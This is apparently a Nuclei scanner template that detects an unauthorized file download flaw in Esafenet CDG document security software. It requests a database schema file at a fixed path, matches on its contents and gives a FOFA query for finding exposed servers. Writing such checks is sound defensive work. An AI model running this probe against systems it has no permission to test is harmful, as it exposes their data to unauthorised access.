id: esafenet-mysql-fileread info: name: Esafenet CDG mysql - File Read author: DhiyaneshDk severity: high description: | CDGServer3 Unauthorized File Download vulnerability is detected. metadata: verified: true max-request: 1 fofa-query: title="电子文档安全管理系统" product: electronic_document_security_management_system vendor: esafenet tags: esafenet,lfi,mysql http: - method: GET path: - "{{BaseURL}}/CDGServer3/SQL/MYSQL/create_SmartSec_mysql.sql" max-size: 1000 matchers-condition: and matchers: - type: word part: body words: - "varchar" - "create table" condition: and - type: word part: header words: - "application/x-sql" - type: status status: - 200 # digest: 4a0a00473045022055e99d1e2acfbfb3c7c6d400466517a1ffe8de9a41e2cb461d4171218000017f022100abe19f0722d0361e60aac84f4a13137a28f67ac5a0526bbee7fb4d16a301ff5f:922c64590222798bb761d5b6d8e72950